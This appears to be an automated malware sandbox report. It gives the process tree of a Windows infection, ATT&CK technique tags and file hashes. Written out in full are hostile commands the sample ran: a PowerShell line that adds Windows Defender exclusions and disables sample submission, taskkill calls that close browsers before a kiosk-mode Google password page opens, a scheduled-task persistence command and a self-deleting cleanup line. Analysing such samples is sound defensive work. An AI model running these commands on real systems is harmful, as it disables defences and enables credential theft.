C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3196,i,5788027168290259570,2329124065303137069,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3208 /prefetch:15⤵
- Uses browser remote debugging
PID:4132
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3228,i,5788027168290259570,2329124065303137069,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3248 /prefetch:15⤵
- Uses browser remote debugging
PID:2380
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4372,i,5788027168290259570,2329124065303137069,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4580 /prefetch:15⤵
- Uses browser remote debugging
PID:884
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4604,i,5788027168290259570,2329124065303137069,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4824 /prefetch:85⤵PID:5220
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4992,i,5788027168290259570,2329124065303137069,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4988 /prefetch:85⤵PID:5284
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:5940 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff80cdf46f8,0x7ff80cdf4708,0x7ff80cdf47185⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5968
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,6842070091829503960,9574433637145049870,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:25⤵PID:3672
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,6842070091829503960,9574433637145049870,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:35⤵PID:5204
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,6842070091829503960,9574433637145049870,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2764 /prefetch:85⤵PID:2668
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2136,6842070091829503960,9574433637145049870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:15⤵
- Uses browser remote debugging
PID:5468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2136,6842070091829503960,9574433637145049870,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:15⤵
- Uses browser remote debugging
PID:5480
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2136,6842070091829503960,9574433637145049870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4812 /prefetch:15⤵
- Uses browser remote debugging
PID:2584
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2136,6842070091829503960,9574433637145049870,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4980 /prefetch:15⤵
- Uses browser remote debugging
PID:4164
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\AAAAECGHCBGC" & exit4⤵
- System Location Discovery: System Language Discovery
PID:5984 -
C:\Windows\SysWOW64\timeout.exetimeout /t 105⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5592
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1010117001\552420d9a1.exe"C:\Users\Admin\AppData\Local\Temp\1010117001\552420d9a1.exe"3⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1732
-
-
C:\Users\Admin\AppData\Local\Temp\1010118001\dcb24ae08a.exe"C:\Users\Admin\AppData\Local\Temp\1010118001\dcb24ae08a.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4828 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 14604⤵
- Program crash
PID:5004
-
-
-
C:\Users\Admin\AppData\Local\Temp\1010119001\eb96d7e10f.exe"C:\Users\Admin\AppData\Local\Temp\1010119001\eb96d7e10f.exe"3⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5516
-
-
C:\Users\Admin\AppData\Local\Temp\1010120001\3a3927d69a.exe"C:\Users\Admin\AppData\Local\Temp\1010120001\3a3927d69a.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5808
-
-
C:\Users\Admin\AppData\Local\Temp\1010121001\a7ad7cb257.exe"C:\Users\Admin\AppData\Local\Temp\1010121001\a7ad7cb257.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:4184
-
-
C:\Users\Admin\AppData\Local\Temp\1010122001\bf76d50978.exe"C:\Users\Admin\AppData\Local\Temp\1010122001\bf76d50978.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5592 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:5612
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:4360
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:2720
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:4960
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:2424
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:3756
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4468 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2028 -parentBuildID 20240401114208 -prefsHandle 1956 -prefMapHandle 1948 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3ed071ef-a45a-4230-b178-81c9cf9f2061} 4468 "\\.\pipe\gecko-crash-server-pipe.4468" gpu6⤵PID:5900
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2464 -parentBuildID 20240401114208 -prefsHandle 2456 -prefMapHandle 2444 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fdde0760-4112-41b4-89e8-bfdd0b997b0e} 4468 "\\.\pipe\gecko-crash-server-pipe.4468" socket6⤵PID:4184
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2936 -childID 1 -isForBrowser -prefsHandle 2872 -prefMapHandle 2856 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8b1f476d-2e23-4282-9e79-cd5ba049337c} 4468 "\\.\pipe\gecko-crash-server-pipe.4468" tab6⤵PID:5968
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3604 -childID 2 -isForBrowser -prefsHandle 3996 -prefMapHandle 3992 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0cdf8996-7391-4d9a-871e-046099371939} 4468 "\\.\pipe\gecko-crash-server-pipe.4468" tab6⤵PID:5128
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4684 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4680 -prefMapHandle 4676 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e3e2d7b0-7ad5-43b5-acfa-1b968f5d07b1} 4468 "\\.\pipe\gecko-crash-server-pipe.4468" utility6⤵
- Checks processor information in registry
PID:5804
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5632 -childID 3 -isForBrowser -prefsHandle 5496 -prefMapHandle 5624 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6ab696a2-c7bd-410d-9a93-7dfe108274b3} 4468 "\\.\pipe\gecko-crash-server-pipe.4468" tab6⤵PID:5388
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5816 -childID 4 -isForBrowser -prefsHandle 5728 -prefMapHandle 5732 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {14727897-043a-48ac-ae07-186a3eebc8bb} 4468 "\\.\pipe\gecko-crash-server-pipe.4468" tab6⤵PID:3248
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6016 -childID 5 -isForBrowser -prefsHandle 5936 -prefMapHandle 5940 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b77f56df-3b08-4ea5-9b92-c07ac636a784} 4468 "\\.\pipe\gecko-crash-server-pipe.4468" tab6⤵PID:6044
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1010123001\a43a749c76.exe"C:\Users\Admin\AppData\Local\Temp\1010123001\a43a749c76.exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:4640
-
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4044
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Drops startup file
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3024 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 518C78EE631F03DF3B669DCFA33BC79F C2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4260
-
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:336
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 0C91ABE7ACC5D841818626E473752DA42⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:228 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss900A.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi8FF6.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr8FF7.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr8FF8.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3636
-
-
-
C:\Users\Admin\AppData\Local\Corporation\SystemCare1.0.exe"C:\Users\Admin\AppData\Local\Corporation\SystemCare1.0.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:776
-
-
C:\Windows\Installer\MSIA3E4.tmp"C:\Windows\Installer\MSIA3E4.tmp" /DontWait /RunAsAdmin /HideWindow "C:\Users\Admin\AppData\Roaming\Installer\Setup\task.bat"2⤵
- Checks computer location settings
- Executes dropped EXE
- Access Token Manipulation: Create Process with Token
- System Location Discovery: System Language Discovery
PID:2280 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ""C:\Users\Admin\AppData\Roaming\Installer\Setup\task.bat" "3⤵
- System Location Discovery: System Language Discovery
PID:4900 -
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "SystemCare" /tr "C:\Users\Admin\AppData\Local\Corporation\SystemCare1.0.exe" /sc onstart /delay 0005:004⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3708
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Start-Process powershell -ArgumentList '-WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command \"Add-MpPreference -ExclusionPath C:\Users\$env:username\AppData\Local; Set-MpPreference -MAPSReporting Disabled; Set-MpPreference -SubmitSamplesConsent NeverSend\"' -NoNewWindow"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4112 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath C:\Users\$env:username\AppData\Local; Set-MpPreference -MAPSReporting Disabled; Set-MpPreference -SubmitSamplesConsent NeverSend"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:624
-
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
PID:5112
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3616
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:532
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:5292
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4828 -ip 48281⤵PID:3268
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2120
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
BITS Jobs
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Component Object Model Hijacking
1Modify Authentication Process
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Access Token Manipulation
1Create Process with Token
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Component Object Model Hijacking
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Access Token Manipulation
1Create Process with Token
1BITS Jobs
1Impair Defenses
2Disable or Modify Tools
2Modify Authentication Process
1Modify Registry
3Virtualization/Sandbox Evasion
3Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
4Credentials In Files
4Discovery
Browser Information Discovery
1Peripheral Device Discovery
2Query Registry
11Remote System Discovery
1System Information Discovery
7System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Virtualization/Sandbox Evasion
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
16KB
MD59a6bfcc7350a04400fae4a4e7361db22
SHA1d0326bf5bbc697015a310da0c66ca47683d5bc7a
SHA25693570305567147902c8c03a869d3e6984e05fcf689b88adf0001c135a63f204e
SHA512031ab5fc7fe9865014a45070be592eb85427a31726c64c1a6232f4c40adeb5fd090e16bf115f5a6784cc3e4cb6185812f50ce78e5bedf12e7f6e62e0c894b999
-
Filesize
1.0MB
MD55dd45593985c6b40d1d2dea0ce9a2fcf
SHA1700fb24d4f4e302ed94f755fa6f7caf9d6fb594e
SHA256237e715b292e3ebfdf7038d42290f9a6457f0375ee965e1236bd763bce413391
SHA512ca4e7df463b3d5643decfda936e4d7db1e3247c8f27a25ace150886a0c3ec2e79f1d82d2c4cbd5b89f42deaf4cd5709a7ca47d24a18ed1e1804b0c1e016966a3
-
Filesize
10KB
MD50d9bd8ec6d39a47f9feb14e75418e9ce
SHA1bd7bbde5f99a7d04e4e161f2e3f5e69aabeaa0f5
SHA2566e43e7f3f0c69e09186b81f4f4b1d27a44d4c027e36f66edc713c82362d5ef63
SHA512b6cf4d7a25d36df59d872ee391abc34403213cfa3e69124fe3c8b09d64e20c071f1f05c7b9faddd0250a62baade7bda0bfe1eeaa8a9e491a9313f753f616fb78
-
Filesize
587KB
MD5aee263964001bcc56ca51ab75c437f05
SHA19a6b4fd812167bef70e2b3232294bfc942ecdb22
SHA2565f6ef36e4fd0765171c68c007e10ab796119c8e0ec37301fe360b77e4fdc8d90
SHA51266e27c6b12d7de386d93b9b7ef3191d19d889996c7367b13acb76aabb86997684e6cc49456149d4e60211d45006307af819f8db47fae29ad7d116009916b012f
-
Filesize
402B
MD5447553c4ffc8c91284524954ca787d39
SHA16c2093de915123d761e96b8ddc04968d29678421
SHA25686c48fe3314848002b9701cf58bd8d10aad53dbdcda2a2f18713cf1d2449d130
SHA512709da7ccbd01d49fe309fac36bc973a1b6cdc25dba9018e678ef10bdb2873693ac225804996ccfd1d80b276a2b96991d84d90ed82dd65509a20b0fd2ac179b63
-
Filesize
1KB
MD56217087ba723823217ea825b3c5a7e3a
SHA14a7c0fa1f24fc9d0dfc383d55e6fdbf1c89b56ef
SHA2565e3bb90793de30f71909ea7a794fc7830a72466f6ae616c0206c787c2a7e56e6
SHA5123efbe2ddd5f1e42437c6f42635c50b423b9a696ec76c6bc3b59ae15975ac8edb2552c15a01458be4433561e601a939091bb67803c4b970dc3343980025f4e2e3
-
Filesize
649B
MD59ebe0204560ada04b6f0bf9e9f5445d4
SHA1d1ae9b82fee4b1ce24a26bf96536b4f06687686f
SHA25631a77f72e31060452c307cb28df51a7d7be7da253f884973b8a41a146f1d68b6
SHA5129904888b058c3b2564a50fba9ac3011bcb1af740546bb8b27a9f4a6f265fd032bca5ac911502f1f1651e81675c8c7b36c53d45282a0d7270f2f0664d6614d09b
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
152B
MD5ba6ef346187b40694d493da98d5da979
SHA1643c15bec043f8673943885199bb06cd1652ee37
SHA256d86eec91f295dfda8ed1c5fa99de426f2fe359282c7ebf67e3a40be739475d73
SHA5122e6cc97330be8868d4b9c53be7e12c558f6eb1ac2c4080a611ba6c43561d0c5bb4791b8a11a8c2371599f0ba73ed1d9a7a2ea6dee2ae6a080f1912e0cb1f656c
-
Filesize
152B
MD5b8880802fc2bb880a7a869faa01315b0
SHA151d1a3fa2c272f094515675d82150bfce08ee8d3
SHA256467b8cd4aacac66557712f9843023dcedefcc26efc746f3e44157bc8dac73812
SHA512e1c6dba2579357ba70de58968b167d2c529534d24bff70568144270c48ac18a48ee2af2d58d78ae741e5a36958fa78a57955bd2456f1df00b781fc1002e123d2
-
Filesize
5KB
MD52845021ee19d3b4f0492ba8e22b08073
SHA103381191b5e1fa8b018697d048fbd8df5e0ad44a
SHA2569de9ed700dd3b612276b61a13a1277c3c5b91b30c781ce6b8ed2240867576ab3
SHA512c100fc51da498ef960152407526868f0c2f6fa6e4893cb9cd15e2d0532a279b7d694eed81067dc0146aebe64e5532d13c05a1bae3095d90e40d505796bbe9871
-
Filesize
1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\y0bypz8z.default-release\activity-stream.discovery_stream.json
Filesize25KB
MD54002a7fc826fe2ee72dfe765f8916be1
SHA153af0e1de49951611918009f6d06a6bd1c35cff9
SHA256fc8734f329e9ba2701a03885bf082e23fcd6ea1e11983787f2ecea0a671c25ec
SHA512d87ed848b3d2fb543a04c499a25e10681860e8d4ef20728ada3b699029825670bf20fca84c14a6482bf711f0ebb0e05d157170157fa4b05b70d9d6c21e24d4ba
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\y0bypz8z.default-release\cache2\entries\39DB9E847E680B765D7B04FCCE6BF5BC0225F878
Filesize13KB
MD54e5ad57ac75a32b2a3c9d4a38114d42a
SHA18586fc3e128814e8a0f5b79d021160ac08071292
SHA256e4e3844110475fd0c7d4a7bebf40ae674ca2d18c2fe11a302e207a5335b636f0
SHA5122140e12bf4e97754224688208f0367cc8d5a03c99818be89b8ef4ff2503faffba3c2a7a43028a66348fff5c443e2e4ff740a8153d4c034f33c7a6983ebf45e9f
-
Filesize
2.9MB
MD5efd35e14043220e2ec5e545be98a442c
SHA1a868cf35dcd96d7e5350a881c0334c77dc5ccb3d
SHA256226e462db2af7de92709a62fd69daf887c48d3d166616c8ede3c56ac16de3cce
SHA51292894619a9ebadef30365054c4deec0d229e3acfe7ad142a65686b24416d4080e2064be073ab6cd7a001741a8a3d1b0729444fcf8e3b11633d190578cfa8970a
-
Filesize
1.6MB
MD518cf1b1667f8ca98abcd5e5dceb462e9
SHA162cf7112464e89b9fa725257fb19412db52edafd
SHA25656a8033f43692f54e008b7a631c027682e1cabd4450f9f45ce10d4fc10f3fcf3
SHA512b66be8acac0152ae3a9a658fde23f3f3ad026e3f8099df5c8771eb1524e8baa2ba9f88b9577a85493f0e241089798e40a158325cb606345c94d979e0088443d0
-
Filesize
42KB
MD556944be08ed3307c498123514956095b
SHA153ffb50051da62f2c2cee97fe048a1441e95a812
SHA256a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181
